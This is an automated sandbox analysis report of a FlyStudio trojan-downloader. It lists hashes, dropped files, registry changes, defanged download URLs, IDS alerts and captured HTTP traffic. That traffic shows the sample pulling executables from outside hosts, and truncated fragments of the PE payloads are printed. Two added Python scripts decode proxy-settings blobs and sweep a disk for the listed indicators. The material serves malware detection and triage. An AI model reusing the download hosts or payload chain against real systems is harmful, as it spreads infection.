Trojan.Win32.FlyStudio_421221caff
Trojan-Downloader.Win32.AirJP.cw (Kaspersky), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 421221caff7013a1e8284c20e10a880e
SHA1: b22eef49083508afbbf1e478cd7121d9720a8d57
SHA256: 37ec83a5c602301b4fb38d748234a700c5e316702abbce80e678e36fde43915d
SSDeep: 49152:1sONdLpgYI3v2KMln3/qeEftMg9qBu5Ea7c5Dg8GIHo4KxNsbLA2DifXtlSO4s:bzL/OvfMln3/qvdVo1pnIJNsbM2D2tz
Size: 4771840 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2017-02-05 16:22:06
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
TxService.exe:2924
The Trojan injects its code into the following process(es):
%original file name%.exe:1908
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process TxService.exe:2924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\sesvcs_963_56089.exe (503 bytes)
%Program Files%\23.txt (27530 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KEZ8B515.txt (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\01[1].txt (24010 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\NamuADLook[1].dll (16650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\26993501420171281319931[1].htm (45330 bytes)
C:\CF_Helper.dll (202 bytes)
%Program Files%\NamuADLook.dll (20518 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\33[1].txt (40 bytes)
The process %original file name%.exe:1908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\TxService.exe (1670 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\20D65GOU.txt (91 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\2672760322016102115848934[1].htm (97343 bytes)
C:\exdui.dll (53 bytes)
Registry activity
The process TxService.exe:2924 makes changes in the system registry. The Tracing\TxService_RASAPI32 and TxService_RASMANCS keys and the Internet Settings proxy values listed below are written by WinInet/RAS on behalf of any process that calls those APIs; they are not persistence, but the key name records the image name, which is why they are worth looking for on a suspect host.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASAPI32]
"EnableFileTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:1908 makes changes in the system registry. The sandbox executes the sample under its MD5 as file name, hence the Tracing\421221caff7013a1e8284c20e10a880e_* key names below; on a real host the key would carry whatever name the dropper was run as.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32\WindowsPowerShell\v1.0]
"powershell.exe,-101" = "Windows PowerShell ISE"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"AccessibilityCpl.dll,-10" = "Ease of Access Center"
"gameux.dll,-10082" = "Games Explorer"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@%Program Files%\Common Files\Microsoft Shared\Ink]
"TipTsf.dll,-80" = "Tablet PC Input Panel"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"gameux.dll,-10061" = "Spider Solitaire"
"pmcsnap.dll,-700" = "Print Management"
"wdc.dll,-10021" = "Performance Monitor"
"mblctr.exe,-1008" = "Windows Mobility Center"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASAPI32]
"FileTracingMask" = "4294901760"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"mycomput.dll,-300" = "Computer Management"
"FXSRESM.dll,-114" = "Windows Fax and Scan"
"msinfo32.exe,-100" = "System Information"
[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"gameux.dll,-10060" = "Solitaire"
"ie4uinit.exe,-737" = "Internet Explorer (No Add-ons)"
"gameux.dll,-10055" = "FreeCell"
[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASMANCS]
"EnableFileTracing" = "0"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"MdSched.exe,-4001" = "Windows Memory Diagnostic"
"gameux.dll,-10059" = "Mahjong Titans"
[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASMANCS]
"MaxFileSize" = "1048576"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"wucltux.dll,-1" = "Windows Update"
[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASAPI32]
"MaxFileSize" = "1048576"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"dfrgui.exe,-103" = "Disk Defragmenter"
"filemgmt.dll,-2204" = "Services"
"gameux.dll,-10102" = "Internet Backgammon"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32\migwiz]
"wet.dll,-588" = "Windows Easy Transfer"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"NetProjW.dll,-501" = "Connect to a Network Projector"
"rstrui.exe,-100" = "System Restore"
"SoundRecorder.exe,-100" = "Sound Recorder"
[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"gameux.dll,-10209" = "More Games from Microsoft"
"wsecedit.dll,-718" = "Local Security Policy"
"gameux.dll,-10056" = "Hearts"
"gameux.dll,-10057" = "Minesweeper"
"gameux.dll,-10054" = "Chess Titans"
"comres.dll,-3410" = "Component Services"
"msra.exe,-100" = "Windows Remote Assistance"
"wdc.dll,-10030" = "Resource Monitor"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@%Program Files%\Common Files\Microsoft Shared\Ink]
"ShapeCollector.exe,-298" = "Personalize Handwriting Recognition"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@%Program Files%\Windows Journal]
"Journal.exe,-3074" = "Windows Journal"
[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32\migwiz]
"wet.dll,-591" = "Windows Easy Transfer Reports"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@%Program Files%\DVD Maker]
"DVDMaker.exe,-61403" = "Windows DVD Maker"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32\Speech\SpeechUX]
"sapi.cpl,-5555" = "Windows Speech Recognition"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"displayswitch.exe,-320" = "Connect to a Projector"
"odbcint.dll,-1310" = "Data Sources (ODBC)"
"gameux.dll,-10103" = "Internet Spades"
"iscsicpl.dll,-5001" = "iSCSI Initiator"
"sdcpl.dll,-101" = "Backup and Restore"
"msconfig.exe,-126" = "System Configuration"
"recdisc.exe,-2000" = "Create a System Repair Disc"
"SyncCenter.dll,-3000" = "Sync Center"
[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@%Program Files%\Windows Sidebar]
"sidebar.exe,-1005" = "Desktop Gadget Gallery"
[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"gameux.dll,-10058" = "Purble Place"
"AuthFWGP.dll,-20" = "Windows Firewall with Advanced Security"
"miguiresource.dll,-101" = "Event Viewer"
"XpsRchVw.exe,-102" = "XPS Viewer"
"miguiresource.dll,-201" = "Task Scheduler"
[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"gameux.dll,-10101" = "Internet Checkers"
[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@%Program Files%\Common Files\Microsoft Shared\Ink]
"mip.exe,-291" = "Math Input Panel"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
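The SavedLegacySettings values above (46 00 00 00 3C 00 00 00 09 00 00 00 ... for the original process, 3D for TxService.exe) are WinInet connection-settings blobs, of which the report prints only the first 16 bytes. The following Python decoder is an added example, not code from the report or from the analysis system: it reads the layout as a version DWORD (0x46 on this Windows 7 sandbox), a change counter that the two processes bumped in turn (0x3C, then 0x3D), a proxy-flags DWORD, and then three DWORD-length-prefixed strings (proxy server, bypass list, PAC URL). Flags 0x09 = direct + auto-detect agree with AutoDetect = 1 and ProxyEnable = 0 above, i.e. the sample did not install a proxy. The build function and its 127.0.0.1:8080 input are constructed here only to show what a manual-proxy blob (flag 0x2) looks like; the decoder reports the report's 16-byte values as truncated rather than guessing the missing string fields.

```python
import struct

# Bits of the proxy-flags DWORD in WinInet's connection-settings blob
# (same layout for DefaultConnectionSettings and SavedLegacySettings).
PROXY_FLAGS = {
    0x1: "PROXY_TYPE_DIRECT",          # no manual proxy
    0x2: "PROXY_TYPE_PROXY",           # manual proxy server configured
    0x4: "PROXY_TYPE_AUTO_PROXY_URL",  # PAC script URL configured
    0x8: "PROXY_TYPE_AUTO_DETECT",     # WPAD auto-detection enabled
}


def _read_lpstr(buf, off):
    """Read one DWORD-length-prefixed string; return (None, off) if the blob is cut short."""
    if off + 4 > len(buf):
        return None, off
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    s = buf[off:off + n]
    if len(s) < n:
        return None, off + n
    return s.decode("latin-1"), off + n


def parse_connection_settings(hex_blob):
    """Decode a blob given as hex ("46 00 00 00 3D ..." as printed in the report, or plain hex)."""
    buf = bytes.fromhex(hex_blob.replace(" ", ""))
    if len(buf) < 12:
        raise ValueError("blob is shorter than the 12-byte fixed header")
    version, counter, flags = struct.unpack_from("<III", buf, 0)
    off = 12
    proxy, off = _read_lpstr(buf, off)     # "host:port" or "http=host:port;https=..."
    bypass, off = _read_lpstr(buf, off)    # ProxyOverride list, e.g. "<local>"
    pac_url, off = _read_lpstr(buf, off)   # AutoConfigURL
    return {
        "version": version,
        "change_counter": counter,
        "flags": flags,
        "flag_names": [name for bit, name in PROXY_FLAGS.items() if flags & bit],
        "proxy_server": proxy,
        "proxy_bypass": bypass,
        "autoconfig_url": pac_url,
        # the report prints only the first 16 bytes of each value, so the string
        # fields after the proxy length cannot be recovered from it
        "truncated": None in (proxy, bypass, pac_url),
    }


def build_connection_settings(flags, proxy="", bypass="", pac_url="", counter=1, version=0x46):
    """Build a complete blob (constructed here to show what a manual-proxy setting looks like)."""
    def lpstr(s):
        b = s.encode("latin-1")
        return struct.pack("<I", len(b)) + b
    return (struct.pack("<III", version, counter, flags)
            + lpstr(proxy) + lpstr(bypass) + lpstr(pac_url)
            + b"\0" * 32)   # reserved trailing bytes, zero in every blob I have seen


if __name__ == "__main__":
    # value of SavedLegacySettings as written by TxService.exe:2924 in this report
    print(parse_connection_settings("46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"))
    # constructed: what the same value would look like if a proxy had been installed
    print(parse_connection_settings(build_connection_settings(0x3, "127.0.0.1:8080", "<local>").hex()))
```

A blob whose flags include 0x2 with a proxy_server pointing at localhost or an unexpected host is the pattern to alert on; the values in this report show only the Windows defaults being rewritten.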
Dropped PE files
| MD5 | File path |
|---|---|
| 15a43a47885c3eff331e97137c08343d | c:\CF_Helper.dll |
| 5c7c865bafa4600bf1aca0e60ed8fa5a | c:\Program Files\NamuADLook.dll |
| a9f7b23173ead00d6254ecd587e3537d | c:\Program Files\sesvcs_963_56089.exe |
| ee904db75d49139181f892ac73859135 | c:\TxService.exe |
| 5c7c865bafa4600bf1aca0e60ed8fa5a | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\NamuADLook[1].dll |
| a9f7b23173ead00d6254ecd587e3537d | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\01[1].txt |
| c472335b008c5942ec8a162177058111 | c:\exdui.dll |
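As an added example, not part of the report, the following Python sweep matches files under a directory tree against the dropped-file indicators in the table above, by MD5 first and by file name as a fallback (a name hit with a different hash is the signal for a rebuilt sample). The pattern for sesvcs_963_56089.exe assumes the numeric suffix varies between builds; that is an assumption, the report shows only this one name. The [1] suffix on NamuADLook[1].dll is how the IE cache names its copy.

```python
import hashlib
import os
import re

# Dropped-file indicators from the table above (MD5 -> file name as dropped).
DROPPED_MD5 = {
    "15a43a47885c3eff331e97137c08343d": "CF_Helper.dll",
    "5c7c865bafa4600bf1aca0e60ed8fa5a": "NamuADLook.dll",
    "a9f7b23173ead00d6254ecd587e3537d": "sesvcs_963_56089.exe",
    "ee904db75d49139181f892ac73859135": "TxService.exe",
    "c472335b008c5942ec8a162177058111": "exdui.dll",
}

# Name patterns as a fallback for rebuilt samples. The numeric suffix of
# sesvcs_963_56089.exe is ASSUMED to vary per build; the report shows one name only.
NAME_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"^TxService\.exe$",
    r"^exdui\.dll$",
    r"^CF_Helper\.dll$",
    r"^NamuADLook(\[\d+\])?\.dll$",   # [1] suffix is how the IE cache stores it
    r"^sesvcs_\d+_\d+\.exe$",
)]


def match_indicator(name, md5_hex):
    """Return a reason string if (name, md5) matches an indicator, else None.
    A hash hit is authoritative; a name-only hit flags a file whose content differs."""
    md5_hex = md5_hex.lower()
    if md5_hex in DROPPED_MD5:
        return "md5 match: " + DROPPED_MD5[md5_hex]
    if any(p.match(name) for p in NAME_PATTERNS):
        return "name match (hash differs: possible new build)"
    return None


def md5_of(path, chunk=1 << 20):
    """Stream the file so large binaries (the sample itself is 4.7 MB) are not read at once."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(root):
    """Walk root and return sorted [(path, reason)] for every matching file."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                reason = match_indicator(name, md5_of(path))
            except OSError:
                continue   # unreadable or locked file: skip rather than abort the sweep
            if reason:
                hits.append((path, reason))
    return sorted(hits)


if __name__ == "__main__":
    import sys
    for path, reason in sweep(sys.argv[1] if len(sys.argv) > 1 else "C:\\"):
        print(reason, path)
```

The report places the droppers at the drive root and in %Program Files%, so those two roots plus the IE cache directory are the minimum scope for a triage run.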
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: www.cfzhushou.com
Product Name: www.cfzhushou.com
Product Version: 2.6.0.0
Legal Copyright: Copyright (C) 2017 CF????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.6.0.0
File Description: CF????
Comments: www.cfzhushou.com
Language: Chinese (Simplified, PRC)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 2151338 | 2154496 | 4.31468 | 22a297cb33f8fd9ebf381594cd93efe0 |
| .rdata | 2158592 | 2443266 | 2445312 | 4.88414 | d5393d00ca5041caceb3be286fbfd789 |
| .data | 4603904 | 442609 | 114688 | 3.80476 | 830b75ec0e3e250f1b99c182a9eee2a1 |
| .rsrc | 5050368 | 52436 | 53248 | 3.85261 | 77ffa92829d4ceb475ff862b04d401a0 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/ | |
| hxxp://blog.163.com/blog/static/26993501420171281319931/ | |
| hxxp://cdct.zhdns.net/aload/as/33.txt | |
| hxxp://xzdownad.zglhsw.com/adpub//01.txt | |
| hxxp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll | |
| hxxp://baike2016.blog.163.com/blog/static/26993501420171281319931/ | |
| hxxp://down.9udn.com/aload/as/33.txt | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
The "Text File" alert corresponds to the GET /adpub//01.txt exchange under Traffic: 502,080 bytes served as Content-Type: text/plain whose body starts with an MZ header and carries UPX0/UPX1 section names. The Dropped PE files table shows the cached 01[1].txt and %Program Files%\sesvcs_963_56089.exe with the same MD5 (a9f7b23173ead00d6254ecd587e3537d), so that download is the dropped executable. The PE download alert corresponds to /aload/cp/NamuADLook.dll (application/x-msdownload).
Traffic
GET /leesin_2017/blog/static/2672760322016102115848934/ HTTP/1.1
Accept: */*
Referer: hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: blog.163.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 20 Feb 2017 12:27:56 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=C943BEB723F67332CC62FAADA0872AD3.yqblog2-8010; Domain=.blog.163.com; Path=/
Set-Cookie: usertrack=c+5+hViq4Mw0u352A5GUAg==; expires=Tue, 20-Feb-18 12:27:56 GMT; domain=.163.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"

b49
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="zh" lang="zh">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="content-type" content="text/html;charset=gbk"/>
<meta http-equiv="content-style-type" content="text/css"/>
<meta http-equiv="content-script-type" content="text/javascript"/>
<meta name="version" content="neblog-1.0"/>
<script type="text/javascript">
document.uniqueID!=document.uniqueID&&!!location.hash&&(location.hash=location.hash);
document.domain = location.hostname.replace(/^.*\.([\w]+\.[\w]+)$/,'$1');
window.focus();
window.getMusicTimeStamp=function(){return 'e77dd8d44dbf016978cef8c076feb15e';};
//BLOG-647:....OS..............................
(function(){
window.setTimeout(function(){
var _loginUserIcon = document.getElementById('loginUserIcon');
var _rsavatarimg = document.getElementById('rsavatarimg');
if(!!_loginUserIcon){
var _loaded1 = false;
var _img1 = new Image();
_img1.onload = function(){
_loaded1 = true;
_img1.onload = null;
};
_img1.src = _loginUserIcon.src;
window.setTimeout(function(){
if(!_loaded1){
<<< skipped >>>
GET /aload/as/33.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: down.9udn.com
Cache-Control: no-cache
HTTP/1.0 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:1466"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 20 Feb 2017 12:34:09 GMT
X-Cache: HIT from ctzjwzs2
Via: 1.0 ctzjwzs2 (squid)
Connection: keep-alive

hXXp://xzdownad.zglhsw.com/adpub//01.txt
HEAD /aload/as/33.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: down.9udn.com
Content-Length: 0
Cache-Control: no-cache
HTTP/1.0 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:1466"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 20 Feb 2017 12:34:09 GMT
X-Cache: HIT from ctzjwzs2
Via: 1.0 ctzjwzs2 (squid)
Connection: keep-alive
HEAD /adpub//01.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 20 Feb 2017 12:28:11 GMT
Content-Type: text/plain
Content-Length: 502080
Connection: keep-alive
Set-Cookie: __cfduid=d7d73ce9a2f1a31b8925f8187ea485f091487593690; expires=Tue, 20-Feb-18 12:28:10 GMT; path=/; domain=.zglhsw.com; HttpOnly
Last-Modified: Mon, 20 Feb 2017 10:13:26 GMT
Accept-Ranges: bytes
ETag: "b4eb72f9618bd21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3341f4f3c46f595a-VIE
GET /adpub//01.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=d7d73ce9a2f1a31b8925f8187ea485f091487593690
HTTP/1.1 200 OK
Date: Mon, 20 Feb 2017 12:28:11 GMT
Content-Type: text/plain
Content-Length: 502080
Connection: keep-alive
Last-Modified: Mon, 20 Feb 2017 10:13:26 GMT
Accept-Ranges: bytes
ETag: "b4eb72f9618bd21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3341f4fc71fd595a-VIE

MZ......................@...................................@...PE..L.
..oE]V......................... ...=...0...@....@.....................
............ZT....@.....................................X....@...x....
......@................................................>..H........
...................................UPX0..... .........................
.....UPX1.........0......................@....rsrc........@..;|.......
...........@..........................................................
.............................U..j.h..D.d..P.......0F.....3..E.VWP.E.d.
93...(...}.3.w.....iE...0...D.l.>@...... .....LW..E.....4....`...;.
ul.{..C.h..|.......e.\....r...P.....z.......%..f7.....E.....H.........
...J.......M.WhZ..QP..?..|..;.u/...Wy...R...W. C.f.Q..$'h. V.$...v.3..
........b..$.;...r&....iw...<..h.B.MZ5....L.....s....,E5P.'.o..O.9.
tk....$.I.P........@..u. .P3..m.....h..L.-....u.V.5.......Q.bT`..[..W.
P..I........P.B.......v(l...mY_^..3......".]...~.~..b.....i.........xj
?.U.j.R.\...`..Pt....8.y .'..>P.x..j.j.j...x.R...........v..h..f.hB
.h..v.....l!.e=..j....lzd...laVn...<L.[1.l....6...`AV.Ph.I;....j...
Q..(T.>.u.....J......j@......5..:..U.P.Q...U..R.\.QR....p;.......,.
...l_.cM... M.#t.j..xV...Ns.6.....\..Vs.z.u.xE...SD.._J^....F..[.[....
.SV.P.X....L...WY.h..V.@.D...#U,........;,.....0X..H/d.c.... Q.._.....
.....9d.!.'...* ..J...H.....KH...&....2.QQh...\..8:.R;........h...p..t
&PMUE.Q.px.D.Q<.p..k$P.W-Q.:..y3...s...?.;RE.....dh.m..~F..........
LV$.....[\..u...BB.\..m..7x`.....VYW..J2.....,.o^[t.r....Q.W.t:v..<<< skipped >>>
HEAD /aload/cp/NamuADLook.dll HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache
Cookie: __cfduid=d7d73ce9a2f1a31b8925f8187ea485f091487593690
HTTP/1.1 200 OK
Date: Mon, 20 Feb 2017 12:28:15 GMT
Content-Type: application/x-msdownload
Content-Length: 345088
Connection: keep-alive
Last-Modified: Sun, 22 Jan 2017 08:33:51 GMT
Accept-Ranges: bytes
ETag: "309aa5428a74d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3341f5130028595a-VIE
GET /aload/cp/NamuADLook.dll HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=d7d73ce9a2f1a31b8925f8187ea485f091487593690
HTTP/1.1 200 OK
Date: Mon, 20 Feb 2017 12:28:15 GMT
Content-Type: application/x-msdownload
Content-Length: 345088
Connection: keep-alive
Last-Modified: Sun, 22 Jan 2017 08:33:51 GMT
Accept-Ranges: bytes
ETag: "309aa5428a74d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3341f51531c8595a-VIE

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..........}........
.....N|......NH.)....NI.......a.......q.........}.............a......N
M......Ny......Nx......N......Rich....................PE..L...on.X....
.......!.....$...........{.......@....................................
..9.....@.............................H............P..................
.....`..@0...D..................................@............@........
.......................text....".......$.................. ..`.rdata..
X....@.......(..............@..@.data...DE....... ..................@.
...rsrc........P......................@..@.reloc...B...`...D..........
........@..B..........................................................
......................................................................
......................................................................
......................................................................
............................................U..j.h.#..d.....PQV. ...3.
